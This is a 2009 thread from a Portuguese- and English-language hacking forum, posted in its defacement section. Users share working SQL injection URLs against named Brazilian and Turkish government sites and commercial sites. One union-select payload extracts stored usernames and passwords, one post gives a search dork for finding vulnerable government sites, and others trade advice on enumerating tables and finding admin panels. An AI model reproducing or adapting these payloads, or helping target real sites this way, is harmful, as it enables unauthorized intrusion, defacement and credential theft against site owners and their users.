Text only | Text with Images

FORUM DARKERS

Segurança & Hacking => Defacement => Topic started by: trouble on 11 de August , 2009, 09:20:19 AM

Title: 16bpm.ms.gov.br & al.mt.gov.br sql inj :S
Post by: trouble on 11 de August , 2009, 09:20:19 AM
http://www.16bpm.ms.gov.br/noticia_detalhes.asp?ID=2370%20and%201=2+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13+ (http://www.16bpm.ms.gov.br/noticia_detalhes.asp?ID=2370%20and%201=2+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13+)



http://www.al.mt.gov.br/V2008/ViewConteudo.asp?no_codigo=23967%20and%201=0+union+select+0,1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables (http://www.al.mt.gov.br/V2008/ViewConteudo.asp?no_codigo=23967%20and%201=0+union+select+0,1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables)


I'm Turkish
I'm don't spk your language

You must find  Administrdor panel  ok? ;)
Title: Re: 16bpm.ms.gov.br & al.mt.gov.br sql inj :S
Post by: Reeves on 11 de August , 2009, 11:03:17 PM
tava demorando pros turcos dar as caras...
* curiozidade *


Hey Turkish, you hate Brazil ?
Its a only question...

thanks for sharing  o/
Title: Re: 16bpm.ms.gov.br & al.mt.gov.br sql inj :S
Post by: trouble on 12 de August , 2009, 06:55:26 AM
no ı don't hate brasil but your web sites has got vuln  very vuln hasn't it ?

and  C00kies crew  perfect

_mlk_ is big c0der
Title: Re: 16bpm.ms.gov.br & al.mt.gov.br sql inj :S
Post by: Mateus on 12 de August , 2009, 01:23:56 PM
insecurity is everywhere, including in turkey ^^

your web sites aren't so secure...on my 2nd page on google, with an poor dork(ID site:.gov,tr filetype:asp) i manually found an vuln site =D

http://www.istanbulcevor.gov.tr/sube_detay.asp?id=23%20and%201=0+union+select+0,1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables (http://www.istanbulcevor.gov.tr/sube_detay.asp?id=23%20and%201=0+union+select+0,1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables)

no country is secure ;)
Title: Re: 16bpm.ms.gov.br & al.mt.gov.br sql inj :S
Post by: Reeves on 12 de August , 2009, 07:30:35 PM
uhauhaHUaUHuhaa

"insecurity is everywhere", YES   o/
and yeah, C00kies crew, _mlk_, C00l3r....  is a fucking brazilian guys!


thx... boaaa  Mateus
Title: Re: 16bpm.ms.gov.br & al.mt.gov.br sql inj :S
Post by: Wuefez on 13 de August , 2009, 03:35:10 AM
Eu fiquei anos nessa vida, os sites mais vulns costumavam ser de:
(I spent years in this life, most vulnerable sites used to be from:)

1. China
2. Brasil

Porque? Estes dois países tem uma quantidade massiva de sites e mão de obra barata, o que resulta em menos uso de frameworks e mais scripts próprios / customizados.

(Why? Because those two countries have a massive ammount of sites and cheap labor, this results in less use of frameworks and more use of own script / customized.)


trouble: memnun oldum
Title: Re: 16bpm.ms.gov.br & al.mt.gov.br sql inj :S
Post by: trouble on 14 de August , 2009, 06:39:03 AM
Quote from: Wuefez on 13 de August , 2009, 03:35:10 AM
Eu fiquei anos nessa vida, os sites mais vulns costumavam ser de:
(I spent years in this life, most vulnerable sites used to be from:)

1. China
2. Brasil

Porque? Estes dois países tem uma quantidade massiva de sites e mão de obra barata, o que resulta em menos uso de frameworks e mais scripts próprios / customizados.

(Why? Because those two countries have a massive ammount of sites and cheap labor, this results in less use of frameworks and more use of own script / customized.)


trouble: memnun oldum

Wuefez:
thx all ben de memnun oldum 
nice to meet u
É um prazer

Mateus:  Muito obrigado :)  all web sites  have got  vuln :)

http://www.canalguia.com.br/verNoticia.asp?codigo=3 (http://www.canalguia.com.br/verNoticia.asp?codigo=3) unclosed :D

http://www.papomix.com.br/noticia.php?id_noticia=-204+union+select+0,1,group_concat(usuario,0x3a,senha),3,4,5,6,7+from+usuario (http://www.papomix.com.br/noticia.php?id_noticia=-204+union+select+0,1,group_concat(usuario,0x3a,senha),3,4,5,6,7+from+usuario)


:)
Title: Re: 16bpm.ms.gov.br & al.mt.gov.br sql inj :S
Post by: trouble on 14 de August , 2009, 07:15:00 AM
Quote from: Mateus on 12 de August , 2009, 01:23:56 PM
insecurity is everywhere, including in turkey ^^

your web sites aren't so secure...on my 2nd page on google, with an poor dork(ID site:.gov,tr filetype:asp) i manually found an vuln site =D

http://www.istanbulcevor.gov.tr/sube_detay.asp?id=23%20and%201=0+union+select+0,1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables (http://www.istanbulcevor.gov.tr/sube_detay.asp?id=23%20and%201=0+union+select+0,1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables)

no country is secure ;)


mateus ths site has got  access
you don't use information_schema
find table ;)
Title: Re: 16bpm.ms.gov.br & al.mt.gov.br sql inj :S
Post by: Mateus on 14 de August , 2009, 09:26:43 AM
Quote
mateus ths site has got  access
you don't use information_schema
find table ;)


lol, i know that Trouble, i just tried a random query just to show it was vuln ¬¬'
Title: Re: 16bpm.ms.gov.br & al.mt.gov.br sql inj :S
Post by: Be.Cool on 14 de August , 2009, 06:46:51 PM
será que ele é relamente turco?!?
Ai ai viu...
Title: Re: 16bpm.ms.gov.br & al.mt.gov.br sql inj :S
Post by: trouble on 15 de August , 2009, 04:34:51 PM
Quote from: Be.Cool on 14 de August , 2009, 06:46:51 PM
será que ele é relamente turco?!?
Ai ai viu...

i'm don't será
u are será
öküz adam ol
Title: Re: 16bpm.ms.gov.br & al.mt.gov.br sql inj :S
Post by: Be.Cool on 15 de August , 2009, 06:21:29 PM
e ainda sabe portugues \o/
End.
Text only | Text with Images